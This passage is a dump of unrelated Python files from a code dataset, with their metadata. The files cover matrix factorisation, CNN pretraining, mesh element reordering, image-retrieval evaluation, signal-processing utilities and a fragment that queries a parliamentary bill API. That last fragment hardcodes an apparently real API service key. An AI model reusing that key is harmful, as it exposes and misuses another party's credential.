300000\r\n    nb_norm = 200\r\n    error_threshold = 1\r\n    Nu,Ni = nmf.init_matrix(nb_users,nb_movies,z,5,0)\r\n    iter_histo,train_error_histo,test_error_histo,Nu,Ni = nmf.SGD_error_included(data_train,data_test,Nu,Ni,nb_iter,nb_norm,eps,epsu,epsi,error_threshold)\r\n    np.save(\"result/data2/iter_histo.npy\",iter_histo)\r\n    np.save(\"result/data2/test_error_histo.npy\",test_error_histo)\r\n    np.save(\"result/data2/train_error_histo.npy\",train_error_histo)\r\n    f, (ax1, ax2) = plt.subplots(2, sharex=True)\r\n    ax1.plot(iter_histo,train_error_histo)\r\n    ax1.set_title('train')\r\n    ax1.set_ylabel('poucentage mal prédit')\r\n    ax2.plot(iter_histo,test_error_histo)\r\n    ax2.set_title('test')\r\n    ax2.set_xlabel('nb iteration')\r\n    f.savefig(\"result/data2/error_percent.pdf\")\r\n\r\ndef test4():\r\n    \"\"\" trouver meilleure eps \"\"\"\r\n    ratings = np.load('data/data2/ratings.npy')\r\n    data_train,data_test = nmf.split_data(ratings)\r\n    nb_users = 6040\r\n    nb_movies = 3883\r\n    z = 3 \r\n    Nu,Ni = nmf.init_matrix(nb_users,nb_movies,z,5,0)\r\n    lb = 1e-5\r\n    up = 1e-1\r\n    nb_eps = 50\r\n    nb_iter = 300000\r\n    eps,eps_ui,error_train,error_test = nmf.optim_eps(data_train,data_test,Nu,Ni,lb,up,nb_eps,nb_iter = nb_iter)\r\n    np.save(\"result/data2/eps.npy\",eps)\r\n    np.save(\"result/data2/error_train.npy\",error_train)\r\n    np.save(\"result/data2/error_test.npy\",error_test)\r\n    error_min = error_test.min()\r\n    print(\"erreur minimale = \", error_min)\r\n    plt.figure()\r\n    plt.imshow(error_test,extent=[lb,up,lb,up])\r\n    plt.colorbar()\r\n    plt.title(\"error_test selon eps\")\r\n    plt.xlabel(\"epsilon de SGD\")\r\n    plt.ylabel(\"epsilon utilisateur idem\")\r\n    plt.savefig(\"result/data2/error_eps.pdf\")\r\n\r\n# error = np.load(\"\")","sub_path":"Recommendation-System/nmf_projet_test.py","file_name":"nmf_projet_test.py","file_ext":"py","file_size_in_byte":4174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"183836129","text":"import torch as T\nfrom torch import nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torch.utils.data import TensorDataset, DataLoader\nimport numpy as np\nimport argparse\nimport matplotlib.pyplot as plt\nfrom torchvision import utils\nfrom tqdm import tqdm\nimport sys\n\ndevice = T.device('cuda') if T.cuda.is_available() else T.device('cpu')\n\ndef make_net(env_w=20, env_h=12, env_p=3):\n    width = env_w*env_p\n    height = env_h*env_p\n    \n    cnn = nn.Sequential(\n        nn.Conv2d(3, 32, kernel_size=8, stride=4, padding=0),\n        nn.ReLU(),\n        nn.Conv2d(32, 64, kernel_size=4, stride=2, 
padding=0),\n nn.ReLU(),\n nn.Conv2d(64, 64, kernel_size=3, stride=1, padding=0),\n nn.ReLU(),\n nn.Flatten(start_dim=1, end_dim=-1)\n )\n \n test_tensor = T.zeros(1,3,height,width)\n with T.no_grad():\n cnn_out_dim = cnn(test_tensor).size()[-1]\n \n linear = nn.Sequential(\n nn.Linear(cnn_out_dim, 512),\n nn.ReLU()\n )\n \n mapping = nn.Linear(512, 52)\n \n return nn.Sequential(\n cnn,\n linear,\n mapping\n )\n \ndef make_dataloader(dataset, split=.9, batch_size=64, random_split=False):\n dataset_images = T.from_numpy(dataset[\"img\"]).transpose(1,-1)#T.from_numpy(dataset[\"img\"].astype(np.float32)/255.).transpose(1,-1)#.to(device)\n dataset_targets = T.from_numpy(dataset[\"obs\"])#.to(device)\n if random_split:\n split_len = int((1.-split)*len(dataset_images))\n idx = np.random.randint(0, len(dataset_images)-split_len)\n train_dataset = TensorDataset(T.cat((dataset_images[:idx], dataset_images[idx+split_len:])),\n T.cat((dataset_targets[:idx], dataset_targets[idx+split_len:])))\n test_dataset = TensorDataset(dataset_images[idx:idx+split_len], dataset_targets[idx:idx+split_len]) \n else:\n idx = int(split*len(dataset_images))\n train_dataset = TensorDataset(dataset_images[:idx], dataset_targets[:idx])\n test_dataset = TensorDataset(dataset_images[idx:], dataset_targets[idx:]) \n train_dataloader = DataLoader(train_dataset, batch_size=batch_size, shuffle=True)\n test_dataloader = DataLoader(test_dataset, batch_size=batch_size, shuffle=False)\n return train_dataloader, test_dataloader, len(train_dataset), len(test_dataset)\n \ndef train_model(dataset, epochs, loss_save_loc=\"loss.png\", batch_size=1024, lr=0.0003, random_split=False, verbose=False, net_path=None, env_p=3):\n if net_path:\n net = T.load(net_path).to(device)\n else:\n net = make_net(env_p=env_p).to(device)\n print(\"Net arch:\", net)\n train_loader, test_loader, num_train, num_test = make_dataloader(dataset, batch_size=batch_size, random_split=random_split)\n print(\"Training number of samples:\", num_train, \"| number of batches:\", len(train_loader))\n print(\"Evaluation number of samples:\", num_test, \"| number of batches:\", len(test_loader))\n optimizer = optim.Adam(net.parameters(), lr=lr)\n training_losses = []\n eval_losses = []\n gen = tqdm(range(epochs), file=sys.stdout)\n for e in gen:\n if not epochs // 10 == 0:\n if e % (epochs // 10) == 0:\n print(\"Epoch:\", e, flush=True)\n net.train()\n training_loss = 0.\n for batch_idx, (data, target) in enumerate(train_loader):\n data = (data.float()/255.).to(device)\n target = target.to(device)\n output = net(data)\n loss = F.mse_loss(output, target)\n optimizer.zero_grad()\n loss.backward()\n training_loss += loss.item()\n optimizer.step()\n if verbose:\n print(\"Average loss during training epoch \", e, \": \", training_loss/num_train, sep=\"\")\n training_losses.append(training_loss/num_train)\n net.eval()\n eval_loss = 0.\n for batch_idx, (data, target) in enumerate(test_loader):\n data = (data.float()/255.).to(device)\n target = target.to(device)\n output = net(data)\n eval_loss += F.mse_loss(output, target).item()\n if verbose:\n print(\"Average loss during eval epoch \", e, \": \", eval_loss/num_test, sep=\"\")\n eval_losses.append(eval_loss/num_test)\n gen.refresh()\n plt.title(\"Average loss per epoch\")\n plt.plot(training_losses, label=\"Train\")\n plt.plot(eval_losses, label=\"Eval\")\n plt.ylim(ymin=0, ymax=eval_losses[0]*1.1)\n plt.legend()\n plt.savefig(loss_save_loc)\n return net.cpu()\n \ndef visTensor(tensor, ch=0, allkernels=False, nrow=8, padding=1): 
\n n,c,w,h = tensor.shape\n\n if allkernels: tensor = tensor.view(n*c, -1, w, h)\n elif c != 3: tensor = tensor[:,ch,:,:].unsqueeze(dim=1)\n\n rows = np.min((tensor.shape[0] // nrow + 1, 64)) \n grid = utils.make_grid(tensor, nrow=nrow, normalize=True, padding=padding)\n plt.figure( figsize=(nrow,rows) )\n plt.imshow(grid.numpy().transpose((1, 2, 0)))\n \ndef visualize_kernels(model, save_loc):\n filter = model[0][0].weight.data.clone().cpu()\n visTensor(filter)\n\n plt.axis('off')\n plt.ioff()\n plt.savefig(save_loc.replace('.', \"_L0.\"))\n\n filter = model[0][2].weight.data.clone().cpu()\n visTensor(filter)\n\n plt.axis('off')\n plt.ioff()\n plt.savefig(save_loc.replace('.', \"_L1.\"))\n\n filter = model[0][4].weight.data.clone().cpu()\n visTensor(filter)\n\n plt.axis('off')\n plt.ioff()\n plt.savefig(save_loc.replace('.', \"_L2.\"))\n \nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"dataset_path\", type=str, help=\"File path of dataset to train on.\")\n parser.add_argument(\"--model_save_loc\", type=str, default=\"model.pth\", help=\"Path to save model to after training.\")\n parser.add_argument(\"--figure_save_loc\", type=str, default=\"loss.png\", help=\"Path to save training/eval loss figure to.\")\n parser.add_argument(\"--num_epochs\", type=int, default=100, help=\"Number of epochs to train for.\")\n parser.add_argument(\"--batch_size\", type=int, default=1024, help=\"Batch size to use during training.\")\n parser.add_argument(\"--learning_rate\", type=float, default=0.0003, help=\"Learning rate to use during training.\")\n parser.add_argument(\"--random_split\", action=\"store_true\", help=\"Indicates that dataset will be randomly split into test/eval (one split only done initially).\")\n parser.add_argument(\"--verbose\", action=\"store_true\", help=\"Verbose output during training.\")\n parser.add_argument(\"--net_path\", type=str, default=None, help=\"(Optional) path to existing model to be trained.\")\n parser.add_argument(\"--env_p\", type=int, default=3, help=\"Value used for image-based environment will draw one in-game grid square as p^2 pixels.\")\n parser.add_argument(\"--weight_viz_loc\", type=str, default=None, help=\"(Optional) path to save weight visualization.\")\n args = parser.parse_args()\n print(args, flush=True)\n \n dataset = np.load(args.dataset_path)\n trained_model = train_model(dataset, args.num_epochs, loss_save_loc=args.figure_save_loc, \n batch_size=args.batch_size, lr=args.learning_rate, random_split=args.random_split, \n verbose=args.verbose, net_path=args.net_path, env_p=args.env_p)\n T.save(trained_model.state_dict(), args.model_save_loc)\n T.save(trained_model[0].state_dict(), args.model_save_loc.replace(\".\", \"_cnn.\"))\n T.save(trained_model[1].state_dict(), args.model_save_loc.replace(\".\", \"_linear.\"))\n \n if args.weight_viz_loc:\n visualize_kernels(trained_model, args.weight_viz_loc)","sub_path":"PythonScripts/nature_cnn_pretrain.py","file_name":"nature_cnn_pretrain.py","file_ext":"py","file_size_in_byte":7637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"204057008","text":"# Write code using find() and string slicing (see section 6.10) to extract the number at the end\n# of the line below. 
Convert the extracted value to a floating point number and print it out.\n# text = \"X-DSPAM-Confidence: 0.8475\";\n\ntext = input(\"Enter text:\")\ncolon_pos = text.find(\":\")\nstr_num = text[colon_pos + 1:]\nstr_strip = str_num.strip()\ntry:\n float_num = float(str_strip)\nexcept:\n print(\"Error - given input has no numbers or has invalid numbers\")\n exit()\nprint(float_num)\n","sub_path":"Python_Data_Structures/string_assi.py","file_name":"string_assi.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"513234908","text":"import queue\n\nfrom constants import *\n\n\nclass ReorderElementConnectivity:\n def __init__(self):\n logging.basicConfig(level=LOGGER_LEVEL, format=LOGGER_FORMAT)\n self.logger = logging.getLogger(__name__)\n\n self.mesh_data = None\n self.count_reorder_pattern_used = None\n pass\n\n def reorder(self, mesh_data):\n \"\"\"\n 要素内の節点順序の並び替えと、\n 要素へのフラグの設定を行う。\n \"\"\"\n self.logger.info(f'start reorder()')\n\n # num_elements\n self.mesh_data = mesh_data\n num_elements = mesh_data.get_num_elements()\n\n self.count_reorder_pattern_used = [0] * len(ORDERED_NODES)\n\n is_ordered = [False] * num_elements\n queue_elements = queue.LifoQueue()\n\n start_element_index = 0\n queue_elements.put(start_element_index)\n element_flag = [ELEMENT_FLAG_UNDETERMINED] * num_elements\n element_flag[start_element_index] = ELEMENT_FLAG_INITIAL\n\n neighbor_element = mesh_data.get_neighbor_element()\n\n count_reorder_success = 0\n count_reorder_fail = 0\n count_loop = 0\n count_ordered = 0\n while not queue_elements.empty():\n count_loop += 1\n if count_loop > 0 and count_loop % LOGGER_INTERVAL == 0:\n self.logger.info(f'reorder : count_loop={count_loop}, count_ordered={count_ordered}, '\n f'queue_size={queue_elements.qsize()}')\n\n element_index = queue_elements.get()\n if is_ordered[element_index]:\n continue\n else:\n is_ordered[element_index] = True\n count_ordered += 1\n \n for i_face in range(NUM_FACES_OF_ELEMENT):\n neighbor_element_index = neighbor_element[element_index][i_face]\n if neighbor_element_index == INVALID:\n continue\n if not is_ordered[neighbor_element_index]:\n continue\n \n if element_flag[neighbor_element_index] == element_flag[element_index]:\n self.logger.warning(f'error: flag mismatched, element={element_index}, face={i_face}, '\n f'neighbor_element={neighbor_element_index}')\n self.logger.warning(f'error: flag mismatched, element_flag={element_flag}')\n else:\n reorder_success = self.reorder_connectivity(element_index, neighbor_element_index)\n if reorder_success:\n count_reorder_success += 1\n else:\n count_reorder_fail += 1\n break\n\n for i_face in range(NUM_FACES_OF_ELEMENT):\n neighbor_element_index = neighbor_element[element_index][i_face]\n if neighbor_element_index != INVALID and not is_ordered[neighbor_element_index]:\n if element_flag[element_index] == ELEMENT_FLAG_A:\n element_flag[neighbor_element_index] = ELEMENT_FLAG_B\n elif element_flag[element_index] == ELEMENT_FLAG_B:\n element_flag[neighbor_element_index] = ELEMENT_FLAG_A\n queue_elements.put(neighbor_element_index)\n\n mesh_data.set_element_flag(element_flag)\n\n self.check_after_reorder()\n\n self.logger.info(f'count_reorder_pattern_used={self.count_reorder_pattern_used}')\n self.logger.info(f'reorder count : success={count_reorder_success}, fail={count_reorder_fail}')\n\n self.logger.info(f'finish reorder()')\n pass\n\n def reorder_connectivity(self, element_index_1, element_index_2):\n \"\"\"\n 
1つの要素の節点順序の並び替えを行う。\n element_index_1が並び替え対象の要素であり、\n element_index_2は、並び替えの基準とする要素である。\n \"\"\"\n mesh_data = self.mesh_data\n elements_df = mesh_data.get_elements_df()\n neighbor_element = mesh_data.get_neighbor_element()\n neighbor_face = mesh_data.get_neighbor_face()\n\n nodes = [elements_df[COLUMN_NODE_0].values, elements_df[COLUMN_NODE_1].values, elements_df[COLUMN_NODE_2].values,\n elements_df[COLUMN_NODE_3].values, elements_df[COLUMN_NODE_4].values, elements_df[COLUMN_NODE_5].values,\n elements_df[COLUMN_NODE_6].values, elements_df[COLUMN_NODE_7]]\n\n nodes_1_before = [\n nodes[0][element_index_1],\n nodes[1][element_index_1],\n nodes[2][element_index_1],\n nodes[3][element_index_1],\n nodes[4][element_index_1],\n nodes[5][element_index_1],\n nodes[6][element_index_1],\n nodes[7][element_index_1]\n ]\n\n neighbor_element_1 = neighbor_element[element_index_1]\n neighbor_element_2 = neighbor_element[element_index_2]\n neighbor_face_1 = neighbor_face[element_index_1]\n neighbor_face_2 = neighbor_face[element_index_2]\n\n face_1 = INVALID\n face_2 = INVALID\n flag_hit_1 = False\n flag_hit_2 = False\n for face_1 in range(NUM_FACES_OF_ELEMENT):\n if element_index_2 == neighbor_element_1[face_1]:\n flag_hit_1 = True\n break\n\n for face_2 in range(NUM_FACES_OF_ELEMENT):\n if element_index_1 == neighbor_element_2[face_2]:\n flag_hit_2 = True\n break\n \n if not flag_hit_1 or not flag_hit_2:\n self.logger.info(f'not neighbor element element_1={element_index_1}, element_2={element_index_2}')\n return False\n\n if neighbor_face_1[face_1] != face_2:\n self.logger.info(f'#a face id mismatch : element_1={element_index_1}, face_1={face_1}, '\n f'element_2={element_index_2}, face_2={face_2}')\n if neighbor_face_2[face_2] != face_1:\n self.logger.info(f'#b face id mismatch : element_1={element_index_1}, face_1={face_1}, '\n f'element_2={element_index_2}, face_2={face_2}')\n\n face_1_correct = FACE_RELATION_ARRAY[face_2]\n\n temp_local_nodes_1 = NODES_OF_FACE[face_1_correct]\n local_node_1_0_temp = temp_local_nodes_1[0]\n local_node_1_1_temp = temp_local_nodes_1[1]\n local_node_1_2_temp = temp_local_nodes_1[2]\n local_node_1_3_temp = temp_local_nodes_1[3]\n\n temp_local_nodes_2 = NODES_OF_FACE_REVERSE[face_2]\n local_node_2_0 = temp_local_nodes_2[0]\n local_node_2_1 = temp_local_nodes_2[1]\n local_node_2_2 = temp_local_nodes_2[2]\n local_node_2_3 = temp_local_nodes_2[3]\n p_2_0 = nodes[local_node_2_0][element_index_2]\n p_2_1 = nodes[local_node_2_1][element_index_2]\n p_2_2 = nodes[local_node_2_2][element_index_2]\n p_2_3 = nodes[local_node_2_3][element_index_2]\n list_2 = [p_2_0, p_2_1, p_2_2, p_2_3]\n\n reorder_pattern_id = INVALID\n flg_reordered = False\n for reorder_pattern_id in range(len(ORDERED_NODES)):\n ordered_nodes = ORDERED_NODES[reorder_pattern_id]\n # after reorder\n local_node_1_0 = ordered_nodes[local_node_1_0_temp]\n local_node_1_1 = ordered_nodes[local_node_1_1_temp]\n local_node_1_2 = ordered_nodes[local_node_1_2_temp]\n local_node_1_3 = ordered_nodes[local_node_1_3_temp]\n # local to global\n p_1_0 = nodes_1_before[local_node_1_0]\n p_1_1 = nodes_1_before[local_node_1_1]\n p_1_2 = nodes_1_before[local_node_1_2]\n p_1_3 = nodes_1_before[local_node_1_3]\n list_1 = [p_1_0, p_1_1, p_1_2, p_1_3]\n\n # self.logger.info(f'list1={list_1}, list2={list_2}')\n if list_1 == list_2:\n flg_reordered = True\n break\n\n if not flg_reordered:\n self.logger.info(f'reorder failed, '\n f'element_1={element_index_1}, face_1={face_1}, '\n f'element_2={element_index_2}, face_2={face_2}')\n return 
False\n\n        self.count_reorder_pattern_used[reorder_pattern_id] += 1\n\n        # self.logger.info(f'reorder_pattern_id={reorder_pattern_id}, '\n        #                  f'element_1={element_index_1}, element_2={element_index_2}')\n\n        neighbor_element_before = [neighbor_element_1[i] for i in range(NUM_FACES_OF_ELEMENT)]\n        neighbor_face_before = [neighbor_face_1[i] for i in range(NUM_FACES_OF_ELEMENT)]\n        for i_face_new in range(NUM_FACES_OF_ELEMENT):\n            face_old = ORDERED_FACE_NUMBER[reorder_pattern_id][i_face_new]\n            \n            neighbor_element_index = neighbor_element_before[face_old]\n            neighbor_face_index = neighbor_face_before[face_old]\n            neighbor_element_1[i_face_new] = neighbor_element_index\n            neighbor_face_1[i_face_new] = neighbor_face_index\n\n            if neighbor_element_index != INVALID and neighbor_face_index != INVALID:\n                if neighbor_face[neighbor_element_index][neighbor_face_index] != face_old:\n                    self.logger.warning(f'error : face mismatch : '\n                                        f'reorder_pattern_id={reorder_pattern_id}, '\n                                        f'element_1={element_index_1}, element_2={element_index_2}')\n                neighbor_face[neighbor_element_index][neighbor_face_index] = i_face_new\n\n        for local_node_id in range(NUM_NODES_OF_ELEMENT):\n            local_node_id_new = ORDERED_NODES[reorder_pattern_id][local_node_id]\n            nodes[local_node_id][element_index_1] = nodes_1_before[local_node_id_new]\n\n        return True\n\n    def check_after_reorder(self):\n        self.logger.info(f'start check_after_reorder()')\n\n        mesh_data = self.mesh_data\n        num_elements = mesh_data.get_num_elements()\n        elements_df = mesh_data.get_elements_df()\n        neighbor_element = mesh_data.get_neighbor_element()\n        neighbor_face = mesh_data.get_neighbor_face()\n        element_flag = mesh_data.get_element_flag()\n\n        flag_error_found = False\n        for i_element in range(num_elements):\n            element_flag_current = element_flag[i_element]\n            if element_flag_current != ELEMENT_FLAG_A and element_flag_current != ELEMENT_FLAG_B:\n                flag_error_found = True\n                self.logger.warning(f'error : unknown element flag : '\n                                    f'element={i_element}, '\n                                    f'element_flag={element_flag_current}')\n\n            for i_face in range(NUM_FACES_OF_ELEMENT):\n                neighbor_element_index = neighbor_element[i_element][i_face]\n                neighbor_face_index = neighbor_face[i_element][i_face]\n\n                if neighbor_element_index == INVALID and neighbor_face_index == INVALID:\n                    pass\n                elif neighbor_element_index == INVALID or neighbor_face_index == INVALID:\n                    flag_error_found = True\n                    self.logger.warning(f'error : INVALID found : '\n                                        f'element={i_element}, face={i_face}, '\n                                        f'neighbor_element={neighbor_element_index}, '\n                                        f'neighbor_face={neighbor_face_index}')\n                else:\n                    element_flag_neighbor = element_flag[neighbor_element_index]\n                    if element_flag_neighbor != ELEMENT_FLAG_A and element_flag_neighbor != ELEMENT_FLAG_B:\n                        flag_error_found = True\n                        self.logger.warning(f'error : unknown element flag : '\n                                            f'neighbor_element={neighbor_element_index}, '\n                                            f'neighbor_element_flag={element_flag_neighbor}')\n\n                    if element_flag_current == element_flag_neighbor:\n                        flag_error_found = True\n                        self.logger.warning(f'error : same element flag contact: '\n                                            f'element={i_element}, face={i_face}, '\n                                            f'element_flag={element_flag_current}, '\n                                            f'neighbor_element={neighbor_element_index}, '\n                                            f'neighbor_face={neighbor_face_index}, '\n                                            f'neighbor_element_flag={element_flag_neighbor}')\n\n                    if neighbor_face_index != FACE_RELATION_ARRAY[i_face]:\n                        flag_error_found = True\n                        self.logger.warning(f'error : face mismatch: element={i_element}, face={i_face}, '\n                                            f'neighbor_element_index={neighbor_element_index}, '\n                                            f'neighbor_face_index={neighbor_face_index}')\n\n        if not flag_error_found:\n            self.logger.info(f'no error found')\n\n        self.logger.info(f'finish check_after_reorder()')\n        pass\n\n","sub_path":"meshconverter/src/reorder_element_connectivity.py","file_name":"reorder_element_connectivity.py","file_ext":"py","file_size_in_byte":13189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"222009830","text":"from sys import path\npath.append(\"../QIK_Web/util/\")\n\nimport constants\nimport logging\nimport delf_search\nimport datetime\n\n# Local constants\nEVAL_K = 16\nIN_FILE = \"data/MSCOCO_Subset_2/MSCOCO_Subset_2.txt\"\nOUT_FILE = \"data/MSCOCO_Subset_2/DELF_Pre_Results_Dict.txt\"\n\ndef retrieve(query_image):\n    ret_dict = {}\n\n    # Reading the input request.\n    query_image_path = constants.TOMCAT_LOC + constants.IMAGE_DATA_DIR + query_image\n\n    # Get DELF results\n    time = datetime.datetime.now()\n\n    delf_results = []\n\n    # Fetching the candidates from DELF.\n    delf_pre_results = delf_search.delf_search(query_image_path, EVAL_K + 1)\n\n    # Noting DELF time.\n    delf_time = datetime.datetime.now() - time\n    print(\"QIK Server :: DELF Fetch Execution time :: \", delf_time)\n    logging.info(\"QIK Server :: DELF Fetch Execution time :: %s\", str(delf_time))\n\n    # Removing query image from the result set.\n    for res in delf_pre_results:\n        img_file = res.rstrip().split(\"/\")[-1]\n        if img_file == query_image:\n            continue\n        delf_results.append(res.rstrip().split(\"/\")[-1])\n    print(\"QIK Server :: DELF :: delf_results :: \", delf_results)\n\n    # Adding data to the return dictionary.\n    ret_dict[\"delf_time\"] = delf_time.microseconds\n    ret_dict[\"delf_results\"] = delf_results\n\n    # Writing the output to a file.\n    with open(OUT_FILE, 'a+') as f:\n        f.write(query_image + \":: \" + str(ret_dict) + \"\\n\")\n\n    print(\"qik_pre_eval :: retrieve :: ret_dict :: \", str(ret_dict))\n    return ret_dict\n\nif __name__ == '__main__':\n    # Setting log level\n    for handler in logging.root.handlers[:]:\n        logging.root.removeHandler(handler)\n    logging.basicConfig(filename=\"QIK_PreEval_Server.log\", level=logging.INFO)\n\n    # Initializing the ML Models.\n    delf_search.init()\n\n    # Reading the images from the file.\n    images = open(IN_FILE, \"r\")\n    for image in images:\n        print(\"qik_pre_eval :: Executing :: \", image)\n        retrieve(image.rstrip())","sub_path":"QIK_Evaluation/delf_pre_eval.py","file_name":"delf_pre_eval.py","file_ext":"py","file_size_in_byte":1987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"114810642","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport plotting as P\n\n##In order to import this toolbox into a python script you need to \n##do the following. Copy the following lines of code below\n# import sys\n# sys.path.append('/home/carlos/Dropbox/BlackBox/math')\n# from math import *\n\n# or\n# In order to get python to search for all of your lovely blackbox \n# python routines. 
Add this to your .bashrc file\n\n# for d in /home/carlos/Dropbox/BlackBox/*/; do\n# \tPYTHONPATH+=:$d\n# done\n# export PYTHONPATH\n\n# In order to get this to work in Thonny you need to navigate to\n# /home/user/.thonny/BundledPython36/lib/python3.6/site-packages and place\n# a symbolic link here\n\n# In Enthough you need to make symbolic links here\n# /home/carlos/.local/share/canopy/edm/envs/User/lib/python2.7/site-packages\n\ndef string2binary(text):\n dec = \" \".join(str(ord(char)) for char in text).split(\" \")\n print(dec)\n return \" \".join(bin(int(b)) for b in dec)\n\ndef interpolateNans(inX):\n outX = []\n x_new = 0\n for x in inX:\n if not np.isnan(x):\n x_new = x\n outX.append(x_new)\n\n return np.asarray(outX)\n\ndef averages(time,input_stream,avg):\n ##Assume input string is in hrs :(\n ##But avg is in minutes :(\n time_avg = []\n data_avg = []\n t0 = time[0]\n numData = 0.0\n cur_avg = 0.0\n ctr = -1\n for t in time:\n #print t,cur_avg,numData\n ctr+=1\n if t > t0 + avg/60.0:\n ##Append avg\n data_avg.append(cur_avg/numData)\n time_avg.append(t0+avg/60.0)\n ##Reset t0,cur_avg and numData\n t0 = t\n cur_avg = 0.0\n numData = 0.0\n else:\n ##Increment numData and rolling average\n numData+=1.0\n cur_avg+= input_stream[ctr]\n\n #Get Last Data point\n time_avg.append(t0+avg/60.0)\n data_avg.append(cur_avg/numData)\n\n return [np.array(time_avg),np.array(data_avg)]\n\ndef sec(x):\n return 1/np.cos(x)\n\ndef psiwrap(xc,yc,x,y,psi):\n psic = np.arctan2(yc-y,xc-x)\n delpsi = -np.arctan2(np.sin(psi)*np.cos(psic)-np.cos(psi)*np.sin(psic),np.cos(psi)*np.cos(psic)+np.sin(psi)*np.sin(psic));\n return delpsi\n\ndef unwrap_simple(inX):\n outX = []\n for x in inX:\n if x > 180:\n x -= 360\n outX.append(x)\n return outX\n\ndef unwrap_complex(inX):\n outX = []\n for idx in range(1,len(inX)):\n if abs(inX[idx]-inX[idx-1]) > 180:\n inX[idx] = inX[idx] - 360\n return inX\n\ndef unwrap(inX,lower_threshold=0):\n #this will fix timer issues that accidentally reset or it will fix issues with heading wrapping around\n #+-360.\n outX = []\n offset = 0\n for x in inX:\n #make sure you've looped through once\n if len(outX) > 0:\n #Assume the function is monotonically increasing\n if x+offset < outX[-1]:\n offset = outX[-1] - x\n outX.append(x+offset)\n\n return outX\n \ndef Reimmann(x,t):\n out = 0\n for i in range(1,len(t)):\n out += x[i]*(t[i]-t[i-1])\n return out \n\ndef fft(f,t,nmax,iplot,pp=None):\n N = len(t)\n tfft = np.linspace(t[0],t[-1],N)\n ffft = np.zeros([len(tfft)])\n if iplot:\n plt.figure()\n plt.plot(t,f,'b-',label='Original Waveform')\n if nmax < 1:\n nmax = 2\n iters = np.arange(1,nmax+1,1)\n an = np.zeros([len(iters)])\n bn = np.zeros([len(iters)])\n L = t[-1]\n d = (1.0/L)*Reimmann(f,t)\n for i in range(0,len(iters)):\n print('FFT frequency = ' + str(i) + ' out of ' + str(len(iters)))\n n = iters[i]\n #Frequency\n w = 2.0*n*np.pi/L\n print('Frequency (Hz) = ' + str(i/L))\n data_a = np.cos(w*tfft)\n data_b = np.sin(w*tfft)\n #Reimann Sum\n ani = (2.0/L)*Reimmann(data_a*f,t)\n bni = (2.0/L)*Reimmann(data_b*f,t)\n #Save Coefficients\n an[i] = ani\n bn[i] = bni\n #Recreate Waveform\n ffft += ani*data_a + bni*data_b\n if iplot == 2:\n plt.plot(t,f,'b-',label='Original Waveform')\n plt.plot(tfft,ffft,'r--',label='Recreated Waveform')\n plt.pause(0.001)\n plt.cla()\n ffft += d\n frequencies = iters/L\n if iplot:\n plt.plot(tfft,ffft,'r--',label='Recreated Waveform')\n plt.grid()\n plt.legend()\n if pp is not None:\n pp.savefig()\n plt.figure()\n 
plt.scatter(frequencies,abs(an),color='b',marker='s',label='An')\n plt.scatter(frequencies,abs(bn),color='r',marker='*',label='Bn')\n plt.legend()\n plt.grid()\n plt.xlabel('Frequencies (Hz)')\n plt.ylabel('Magnitude')\n if pp is not None:\n pp.savefig()\n return d,an,bn,iters,frequencies\n\ndef Complimentary(sigma,inX):\n outX = np.zeros(len(inX))\n outX[0] = inX[0]\n for idx in range(0,len(inX)-1):\n outX[idx+1] = (1-sigma)*outX[idx] + sigma*inX[idx]\n \n return outX\n\ndef Moving_Average(num,inX):\n outX = np.zeros(len(inX))\n window = np.zeros(num)\n ctr = 0\n START_AVERAGING = 0\n for idx in range(0,len(inX)):\n window[ctr] = inX[idx]\n ctr+=1\n if ctr >= num:\n ctr = 0\n START_AVERAGING = 1\n if START_AVERAGING:\n s = np.sum(window)\n avg = s/num\n outX[idx] = avg\n return outX\n\ndef LowPass(inY,inX,a):\n dt = inX[1]-inX[0]\n #print(\"Timestep = \",dt)\n tau = 1.0/a\n #print(\"Tau = \",tau)\n alfa = 2*tau/dt\n #print(\"Alfa = \",alfa)\n outY = np.zeros(len(inY))\n outY[0] = inY[0]\n outX = np.zeros(len(inX))\n outX[0] = inX[0]\n for x in range(0,len(inX)-1):\n outY[x+1] = (inY[x+1]+inY[x]-outY[x]*(1-alfa))/(alfa+1)\n outX[x+1] = (inX[x+1]+inX[x]-outX[x]*(1-alfa))/(alfa+1)\n\n return [outY,outX]\n\ndef Derivative(inY,inX,threshold):\n deriv = np.copy(inY)*0\n last_non_zero = 0.0\n for j in range(0,len(inX)-2):\n deriv[j] = (-inY[j+2]+4*inY[j+1]-3*inY[j])/(2*(inX[j]-inX[j-1]))\n if abs(deriv[j]) > threshold:\n deriv[j] = last_non_zero\n else:\n if abs(deriv[j]) > 0.0:\n last_non_zero = deriv[j]\n\n xyout = [deriv,inX]\n \n return xyout\n\n# Copyright - Carlos Montalvo 2016\n# You may freely distribute this file but please keep my name in here\n# as the original owner\n","sub_path":"mymath/mymath.py","file_name":"mymath.py","file_ext":"py","file_size_in_byte":6338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"543789122","text":"import xml.etree.ElementTree as ET\nimport urllib.request\nimport time\nimport mysql\n\nURL = 'http://apis.data.go.kr/9710000/BillInfoService/getBillInfoList'\nSERVICE_KEY = '&ServiceKey=ACeHLDbQGARcstF1upsWKu0Smqm7vo%2FNai%2BOze\\\nYzMQtFivEmw0Wh6fgnLZhKMybSEE4ZvJHiLcfZHQYwF7HsSQ%3D%3D'\n\ndef bill_list(all_bills, politician_id, name, num_of_rows, is_representative):\n values = {\n 'numOfRows': num_of_rows,\n 'gbn': 'dae_num_name',\n 'mem_name': name,\n 'mem_name_check': is_representative,\n 'ord': 'A01',\n 'start_ord': 20,\n 'end_ord': 20,\n 'proposer_kind_cd': 'F01',\n }\n\n # for _ in range(1):\n data = urllib.parse.urlencode(values)\n full_url = URL + '?' 
